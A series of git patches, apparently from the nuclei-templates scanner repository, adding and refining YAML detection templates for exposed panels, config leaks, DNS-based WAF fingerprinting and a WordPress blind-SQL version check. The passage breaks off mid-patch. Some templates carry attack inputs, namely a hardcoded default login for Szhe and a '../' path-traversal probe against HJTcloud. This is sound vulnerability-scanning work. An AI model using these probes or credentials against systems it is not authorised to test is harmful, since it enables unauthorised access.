From b32eac85b177d49cbe7c7a2c6b8e00b99610c720 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 25 May 2021 14:35:41 +0300 Subject: [PATCH 001/144] Give description --- vulnerabilities/other/kafdrop-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/kafdrop-xss.yaml b/vulnerabilities/other/kafdrop-xss.yaml index 4f1d87554f..e7061938bd 100644 --- a/vulnerabilities/other/kafdrop-xss.yaml +++ b/vulnerabilities/other/kafdrop-xss.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: medium tags: kafdrop,xss + description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server. reference: https://github.com/HomeAdvisor/Kafdrop/issues/12 requests: From 6af263bb306ce2c18ea19715abab704f88f21491 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 03:34:10 +0530 Subject: [PATCH 002/144] Matcher update --- takeovers/bitbucket-takeover.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/takeovers/bitbucket-takeover.yaml b/takeovers/bitbucket-takeover.yaml index 92d3177cae..f37cb4a198 100644 --- a/takeovers/bitbucket-takeover.yaml +++ b/takeovers/bitbucket-takeover.yaml @@ -12,8 +12,13 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - - The page you have requested does not exist - - Repository not found \ No newline at end of file + - Repository not found + part: body + + words: + - text/plain + part: header \ No newline at end of file From 2a8605e777c40a1c9e8992715491c2c044e6cb54 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 03:35:34 +0530 Subject: [PATCH 003/144] Update bitbucket-takeover.yaml --- takeovers/bitbucket-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/takeovers/bitbucket-takeover.yaml b/takeovers/bitbucket-takeover.yaml index f37cb4a198..98ea79e80a 100644 --- a/takeovers/bitbucket-takeover.yaml +++ b/takeovers/bitbucket-takeover.yaml @@ -19,6 +19,7 @@ requests: - Repository not found part: body + - type: word words: - text/plain part: header \ No newline at end of file From 4bd6703ba87c552db785b0221a94c4aad9191c5e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 02:12:24 +0000 Subject: [PATCH 004/144] Create szhe-default-password.yaml --- .../szhe/szhe-default-password.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 default-logins/szhe/szhe-default-password.yaml diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-password.yaml new file mode 100644 index 0000000000..f0e26e28c9 --- /dev/null +++ b/default-logins/szhe/szhe-default-password.yaml @@ -0,0 +1,33 @@ +id: szhe-default-password + +info: + name: Szhe Default Password + author: pikpikcu + severity: low + tags: szhe,dlogin +# vendor: https://github.com/Cl0udG0d/SZhe_Scan + +requests: + - method: POST + path: + - "{{BaseURL}}/login/" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + email=springbird%40qq.com&password=springbird&remeber=true + + matchers-condition: and + matchers: + + - type: word + words: + - '' + + - type: word + words: + - 'Set-Cookie' + part: header + + - type: status + status: + - 302 From 36c45cfbc91df9bc2166cf725b3ac658682a34ae Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 02:21:40 +0000 Subject: [PATCH 005/144] Create hikvision-info-leak.yaml --- exposures/configs/hikvision-info-leak.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposures/configs/hikvision-info-leak.yaml diff --git a/exposures/configs/hikvision-info-leak.yaml b/exposures/configs/hikvision-info-leak.yaml new file mode 100644 index 0000000000..90850aa0f0 --- /dev/null +++ b/exposures/configs/hikvision-info-leak.yaml @@ -0,0 +1,19 @@ +id: hikvision-info-leak + +info: + name: Hikvision Info Leak + author: pikpikcu + severity: medium + tags: exposure,config + +requests: + - method: GET + path: + - '{{BaseURL}}//config/user.xml' + + matchers: + - type: word + words: + - '' + - 'You should be redirected automatically to target URL: /' - type: word words: - - 'Set-Cookie' + - 'Set-Cookie: session' part: header - type: status From a716d7588853c468c50aeeb765f6ac6075a6c592 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 05:40:54 +0000 Subject: [PATCH 010/144] Auto Update README [Mon May 31 05:40:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7dc4de54e4..4343e30ff4 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 321 | vulnerabilities | 170 | exposed-panels | 137 | | takeovers | 67 | exposures | 104 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 28 | exposed-tokens | 0 | dns | 8 | +| default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**108 directories, 1168 files**. +**109 directories, 1169 files**. From 97195bf33c1d0ebf2e73c644777515621377e370 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 05:45:01 +0000 Subject: [PATCH 011/144] Create hjtcloud-information-disclosure.yaml --- .../hjtcloud-information-disclosure.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/hjtcloud-information-disclosure.yaml diff --git a/exposures/configs/hjtcloud-information-disclosure.yaml b/exposures/configs/hjtcloud-information-disclosure.yaml new file mode 100644 index 0000000000..2cb19bf1f5 --- /dev/null +++ b/exposures/configs/hjtcloud-information-disclosure.yaml @@ -0,0 +1,25 @@ +id: hjtcloud-information-disclosure + +info: + name: HJTcloud Information Disclosure + author: pikpikcu + severity: low + reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw + tags: hjtcloud,exposure,config + + +requests: + - method: GET + path: + - "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../" + + matchers-condition: and + matchers: + + - type: word + words: + - "/var/logs/../logs/" + + - type: status + status: + - 200 From 670b488bfe558739df7d7b98ac53e4a79ae72c20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 11:17:26 +0530 Subject: [PATCH 012/144] more strict matcher --- exposures/configs/hikvision-info-leak.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposures/configs/hikvision-info-leak.yaml b/exposures/configs/hikvision-info-leak.yaml index 90850aa0f0..c9c6095b67 100644 --- a/exposures/configs/hikvision-info-leak.yaml +++ b/exposures/configs/hikvision-info-leak.yaml @@ -9,11 +9,17 @@ info: requests: - method: GET path: - - '{{BaseURL}}//config/user.xml' + - '{{BaseURL}}/config/user.xml' + matchers-condition: and matchers: - type: word words: - ' Date: Mon, 31 May 2021 14:05:54 +0800 Subject: [PATCH 016/144] Adds DNS-based Cloud WAF detect --- technologies/dns-based-waf-detect.yaml | 172 +++++++++++++++++++++++++ 1 file changed, 172 insertions(+) create mode 100644 technologies/dns-based-waf-detect.yaml diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml new file mode 100644 index 0000000000..0a343d3bc8 --- /dev/null +++ b/technologies/dns-based-waf-detect.yaml @@ -0,0 +1,172 @@ +id: dns-based-waf-detect + +info: + name: DNS-based WAF Detection + author: lu4nx + severity: info + tags: waf,tech, cloud + +dns: + - name: "{{FQDN}}" + type: A + recursion: true + retries: 5 + class: inet + matchers: + - type: word + name: sanfor-shield + words: + - ".sangfordns.com" + + - type: word + name: 360panyun + words: + - ".360panyun.com" + + - type: word + name: baiduyun + words: + - ".yunjiasu-cdn.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.cn" + - ".cyudun.net" + + - type: word + name: knownsec + words: + - ".jiashule.com" + - ".jiasule.org" + + - type: word + name: huaweicloud + words: + - ".huaweicloudwaf.com" + + - type: word + name: xinliuyun + words: + - ".ngaagslb.cn" + + - type: word + name: chinacache + words: + - ".chinacache.net" + - ".ccgslb.net" + + - type: word + name: nscloudwaf + words: + - ".nscloudwaf.com" + + - type: word + name: wangsu + words: + - ".wsssec.com" + - ".lxdns.com" + - ".wscdns.com" + - ".cdn20.com" + - ".cdn30.com" + - ".ourplat.net" + - ".wsdvs.com" + - ".wsglb0.com" + - ".wswebcdn.com" + - ".wswebpic.com" + - ".wsssec.com" + - ".wscloudcdn.com" + - ".mwcloudcdn.com" + + - type: word + name: qianxin + words: + - ".360safedns.com" + - ".360cloudwaf.com" + + - type: word + name: baiduyunjiasu + words: + - ".yunjiasu-cdn.net" + + - type: word + name: anquanbao + words: + - ".anquanbao.net" + + - type: regex + name: aliyun + regex: + - '\.w\.kunlun\w{2,3}\.com' + + - type: regex + name: aliyun-waf + regex: + - '\.aliyunddos\d+\.com' + - '\.aliyunwaf\.com' + - '\.aligaofang\.com' + - '\.aliyundunwaf\.com' + + - type: word + name: xuanwudun + words: + - ".saaswaf.com" + - ".dbappwaf.cn" + + - type: word + name: yundun + words: + - ".hwwsdns.cn" + - ".yunduncname.com" + +dns: + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + matchers: + - type: word + name: knownsec + words: + - ".jiasule.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.net" + + - type: word + name: qianxin + words: + - ".360wzb.com" + + - type: word + name: anquanbao + words: + - ".anquanbao.com" + + - type: word + name: wangsu + words: + - ".chinanetcenter.com" + + - type: word + name: baiduyunjiasue + words: + - ".ns.yunjiasu.com" + + - type: word + name: chinacache + words: + - ".chinacache.com" + + - type: word + name: cloudflare + words: + - "ns.cloudflare.com" + + - type: word + name: edns + words: + - ".iidns.com" From 51d2385d07d7a5c8c3d3351658940b20e36c22d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:07:40 +0000 Subject: [PATCH 017/144] Auto Update README [Mon May 31 06:07:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a99bbb1ecc..cd2761a086 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 137 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1170 files**. +**109 directories, 1171 files**. From 95248409e1031b33ee075d000cf4d280f6ac7bc1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 11:46:27 +0530 Subject: [PATCH 018/144] Added servicedesk-login-panel --- exposed-panels/servicedesk-login-panel.yaml | 23 +++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/servicedesk-login-panel.yaml diff --git a/exposed-panels/servicedesk-login-panel.yaml b/exposed-panels/servicedesk-login-panel.yaml new file mode 100644 index 0000000000..fa86dad366 --- /dev/null +++ b/exposed-panels/servicedesk-login-panel.yaml @@ -0,0 +1,23 @@ +id: servicedesk-login-panel + +info: + name: Servicedesk Login Panel Detector + author: aashiq + severity: info + description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint + tags: servicedesk,confluence,jira,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/servicedesk/customer/user/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "https://confluence.atlassian.com" From d7afa45da42a834b203db152390516a5a8481a56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:24:05 +0000 Subject: [PATCH 019/144] Auto Update README [Mon May 31 06:24:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cd2761a086..4fa565e818 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 137 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 138 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1171 files**. +**109 directories, 1172 files**. From 920694cd22b09416dbe92fbf106fdfe687da8690 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 11:58:26 +0530 Subject: [PATCH 020/144] Added ems-login-panel --- exposed-panels/ems-login-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/ems-login-panel.yaml diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml new file mode 100644 index 0000000000..b93eb5bf4e --- /dev/null +++ b/exposed-panels/ems-login-panel.yaml @@ -0,0 +1,23 @@ + +id: ems-login-panel + +info: + name: EMS Login page detection + author: __Fazal + severity: info + tags: panel,ems + +requests: + - method: GET + path: + - '{{BaseURL}}/EMSWebClient/Login.aspx' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "EMS Web Client - Login" From 002168c1c4b021cef90b3958d1d6a3488b50d3d9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:00:16 +0530 Subject: [PATCH 021/144] Update ems-login-panel.yaml --- exposed-panels/ems-login-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml index b93eb5bf4e..85879462c6 100644 --- a/exposed-panels/ems-login-panel.yaml +++ b/exposed-panels/ems-login-panel.yaml @@ -1,4 +1,3 @@ - id: ems-login-panel info: From f95bc62e25002275e88495530a074a099dd82fd0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:32:37 +0000 Subject: [PATCH 022/144] Auto Update README [Mon May 31 06:32:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4fa565e818..db55a48ec7 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 138 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1172 files**. +**109 directories, 1173 files**. From 833123bb1e90ba6851673c5a822dcbf5884e0b5b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:22:50 +0530 Subject: [PATCH 023/144] misc changes --- technologies/dns-based-waf-detect.yaml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml index 0a343d3bc8..34a905c833 100644 --- a/technologies/dns-based-waf-detect.yaml +++ b/technologies/dns-based-waf-detect.yaml @@ -4,14 +4,21 @@ info: name: DNS-based WAF Detection author: lu4nx severity: info - tags: waf,tech, cloud + tags: tech,waf,dns dns: - name: "{{FQDN}}" - type: A + type: CNAME recursion: true retries: 5 class: inet + + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + matchers: - type: word name: sanfor-shield @@ -119,15 +126,8 @@ dns: - ".hwwsdns.cn" - ".yunduncname.com" -dns: - - name: "{{FQDN}}" - type: NS - recursion: true - retries: 5 - class: inet - matchers: - type: word - name: knownsec + name: knownsec-ns words: - ".jiasule.net" From 9cd21c72b8f05fd0fbbe3579e7de37c918dcf0e9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:28:19 +0530 Subject: [PATCH 024/144] Added exposed-vscode --- exposures/configs/exposed-vscode.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposures/configs/exposed-vscode.yaml diff --git a/exposures/configs/exposed-vscode.yaml b/exposures/configs/exposed-vscode.yaml new file mode 100644 index 0000000000..6bc6c6661d --- /dev/null +++ b/exposures/configs/exposed-vscode.yaml @@ -0,0 +1,18 @@ +id: exposed-vscode + +info: + name: Exposed VSCode Folders + author: aashiq + severity: low + description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body + tags: vscode,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.vscode/" + matchers: + - type: word + words: + - "Index of /.vscode" + part: body \ No newline at end of file From b6794ca7fb17ce8f4adffe7094ef133041459043 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:58:46 +0000 Subject: [PATCH 025/144] Auto Update README [Mon May 31 06:58:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index db55a48ec7..1a6adcd332 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | -| takeovers | 67 | exposures | 105 | technologies | 97 | +| takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1173 files**. +**109 directories, 1174 files**. From 1eaacde26df4c0e161de3f92a77dd212e0f9c655 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:34:09 +0530 Subject: [PATCH 026/144] misc fix --- dns/dns-waf-detect.yaml | 172 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 172 insertions(+) create mode 100644 dns/dns-waf-detect.yaml diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml new file mode 100644 index 0000000000..2c7870a1f1 --- /dev/null +++ b/dns/dns-waf-detect.yaml @@ -0,0 +1,172 @@ +id: dns-waf-detect + +info: + name: DNS WAF Detection + author: lu4nx + severity: info + tags: tech,waf,dns + +dns: + - name: "{{FQDN}}" + type: CNAME + recursion: true + retries: 5 + class: inet + + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + + matchers: + - type: word + name: sanfor-shield + words: + - ".sangfordns.com" + + - type: word + name: 360panyun + words: + - ".360panyun.com" + + - type: word + name: baiduyun + words: + - ".yunjiasu-cdn.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.cn" + - ".cyudun.net" + + - type: word + name: knownsec + words: + - ".jiashule.com" + - ".jiasule.org" + + - type: word + name: huaweicloud + words: + - ".huaweicloudwaf.com" + + - type: word + name: xinliuyun + words: + - ".ngaagslb.cn" + + - type: word + name: chinacache + words: + - ".chinacache.net" + - ".ccgslb.net" + + - type: word + name: nscloudwaf + words: + - ".nscloudwaf.com" + + - type: word + name: wangsu + words: + - ".wsssec.com" + - ".lxdns.com" + - ".wscdns.com" + - ".cdn20.com" + - ".cdn30.com" + - ".ourplat.net" + - ".wsdvs.com" + - ".wsglb0.com" + - ".wswebcdn.com" + - ".wswebpic.com" + - ".wsssec.com" + - ".wscloudcdn.com" + - ".mwcloudcdn.com" + + - type: word + name: qianxin + words: + - ".360safedns.com" + - ".360cloudwaf.com" + + - type: word + name: baiduyunjiasu + words: + - ".yunjiasu-cdn.net" + + - type: word + name: anquanbao + words: + - ".anquanbao.net" + + - type: regex + name: aliyun + regex: + - '\.w\.kunlun\w{2,3}\.com' + + - type: regex + name: aliyun-waf + regex: + - '\.aliyunddos\d+\.com' + - '\.aliyunwaf\.com' + - '\.aligaofang\.com' + - '\.aliyundunwaf\.com' + + - type: word + name: xuanwudun + words: + - ".saaswaf.com" + - ".dbappwaf.cn" + + - type: word + name: yundun + words: + - ".hwwsdns.cn" + - ".yunduncname.com" + + - type: word + name: knownsec-ns + words: + - ".jiasule.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.net" + + - type: word + name: qianxin + words: + - ".360wzb.com" + + - type: word + name: anquanbao + words: + - ".anquanbao.com" + + - type: word + name: wangsu + words: + - ".chinanetcenter.com" + + - type: word + name: baiduyunjiasue + words: + - ".ns.yunjiasu.com" + + - type: word + name: chinacache + words: + - ".chinacache.com" + + - type: word + name: cloudflare + words: + - "ns.cloudflare.com" + + - type: word + name: edns + words: + - ".iidns.com" From e0b970cf6f15388be532caaecb45570d08a22eff Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:44:26 +0530 Subject: [PATCH 027/144] removing duplicate --- technologies/dns-based-waf-detect.yaml | 172 ------------------------- 1 file changed, 172 deletions(-) delete mode 100644 technologies/dns-based-waf-detect.yaml diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml deleted file mode 100644 index 34a905c833..0000000000 --- a/technologies/dns-based-waf-detect.yaml +++ /dev/null @@ -1,172 +0,0 @@ -id: dns-based-waf-detect - -info: - name: DNS-based WAF Detection - author: lu4nx - severity: info - tags: tech,waf,dns - -dns: - - name: "{{FQDN}}" - type: CNAME - recursion: true - retries: 5 - class: inet - - - name: "{{FQDN}}" - type: NS - recursion: true - retries: 5 - class: inet - - matchers: - - type: word - name: sanfor-shield - words: - - ".sangfordns.com" - - - type: word - name: 360panyun - words: - - ".360panyun.com" - - - type: word - name: baiduyun - words: - - ".yunjiasu-cdn.net" - - - type: word - name: chuangyudun - words: - - ".365cyd.cn" - - ".cyudun.net" - - - type: word - name: knownsec - words: - - ".jiashule.com" - - ".jiasule.org" - - - type: word - name: huaweicloud - words: - - ".huaweicloudwaf.com" - - - type: word - name: xinliuyun - words: - - ".ngaagslb.cn" - - - type: word - name: chinacache - words: - - ".chinacache.net" - - ".ccgslb.net" - - - type: word - name: nscloudwaf - words: - - ".nscloudwaf.com" - - - type: word - name: wangsu - words: - - ".wsssec.com" - - ".lxdns.com" - - ".wscdns.com" - - ".cdn20.com" - - ".cdn30.com" - - ".ourplat.net" - - ".wsdvs.com" - - ".wsglb0.com" - - ".wswebcdn.com" - - ".wswebpic.com" - - ".wsssec.com" - - ".wscloudcdn.com" - - ".mwcloudcdn.com" - - - type: word - name: qianxin - words: - - ".360safedns.com" - - ".360cloudwaf.com" - - - type: word - name: baiduyunjiasu - words: - - ".yunjiasu-cdn.net" - - - type: word - name: anquanbao - words: - - ".anquanbao.net" - - - type: regex - name: aliyun - regex: - - '\.w\.kunlun\w{2,3}\.com' - - - type: regex - name: aliyun-waf - regex: - - '\.aliyunddos\d+\.com' - - '\.aliyunwaf\.com' - - '\.aligaofang\.com' - - '\.aliyundunwaf\.com' - - - type: word - name: xuanwudun - words: - - ".saaswaf.com" - - ".dbappwaf.cn" - - - type: word - name: yundun - words: - - ".hwwsdns.cn" - - ".yunduncname.com" - - - type: word - name: knownsec-ns - words: - - ".jiasule.net" - - - type: word - name: chuangyudun - words: - - ".365cyd.net" - - - type: word - name: qianxin - words: - - ".360wzb.com" - - - type: word - name: anquanbao - words: - - ".anquanbao.com" - - - type: word - name: wangsu - words: - - ".chinanetcenter.com" - - - type: word - name: baiduyunjiasue - words: - - ".ns.yunjiasu.com" - - - type: word - name: chinacache - words: - - ".chinacache.com" - - - type: word - name: cloudflare - words: - - "ns.cloudflare.com" - - - type: word - name: edns - words: - - ".iidns.com" From c6c139abe38caadf06b34d30b91fd2e2aac01580 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 07:17:35 +0000 Subject: [PATCH 028/144] Auto Update README [Mon May 31 07:17:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1a6adcd332..0cacc956a9 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 29 | exposed-tokens | 0 | dns | 8 | +| default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1174 files**. +**109 directories, 1175 files**. From e89760c89ca9aa6620c4a75f29bfbf4fa9486def Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Mon, 31 May 2021 14:23:44 +0700 Subject: [PATCH 029/144] Create wp-statistics-blindsql.yaml --- .../wordpress/wp-statistics-blindsql.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-statistics-blindsql.yaml diff --git a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml new file mode 100644 index 0000000000..3fc6f4af66 --- /dev/null +++ b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml @@ -0,0 +1,32 @@ +id: WP-Statistics-BlindSQL +info: + name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection + author: lotusdll + severity: critical + description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. + reference: | + - https://www.exploit-db.com/exploits/49894 + - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ + - https://github.com/Udyz/WP-Statistics-BlindSQL + tags: unauth,blindsql,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WP Statistics" + part: body + + - type: regex + regex: + - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]' + part: body From 70b03b9958d0413f893a69d708254c5faa8d0886 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 13:02:17 +0530 Subject: [PATCH 030/144] Added lancom-router-panel --- exposed-panels/lancom-router-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/lancom-router-panel.yaml diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml new file mode 100644 index 0000000000..6faaf29400 --- /dev/null +++ b/exposed-panels/lancom-router-panel.yaml @@ -0,0 +1,22 @@ +id: lancom-router-panel + +info: + name: Lancom Router Panel + author: __Fazal + severity: info + tags: panel,lancom + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "LANCOM 1790VA-4G" \ No newline at end of file From 7eaa44b1c6cdbea3128c812c99626dbf7005c0aa Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 13:09:04 +0530 Subject: [PATCH 031/144] Added clave-login-panel --- exposed-panels/clave-login-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/clave-login-panel.yaml diff --git a/exposed-panels/clave-login-panel.yaml b/exposed-panels/clave-login-panel.yaml new file mode 100644 index 0000000000..6b10058d50 --- /dev/null +++ b/exposed-panels/clave-login-panel.yaml @@ -0,0 +1,23 @@ +id: clave-login-panel + +info: + name: Clave login panel + author: __Fazal + severity: info + tags: panel,clave + +requests: + - method: GET + path: + - '{{BaseURL}}/admin.php' + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Clave" \ No newline at end of file From 2b1a39cbab61a2f6eae1eca53eefa0d3a1f3b8a0 Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Mon, 31 May 2021 14:39:15 +0700 Subject: [PATCH 032/144] Update wp-statistics-blindsql.yaml --- vulnerabilities/wordpress/wp-statistics-blindsql.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml index 3fc6f4af66..40730242cd 100644 --- a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml +++ b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml @@ -28,5 +28,5 @@ requests: - type: regex regex: - - 'Stable tag\: 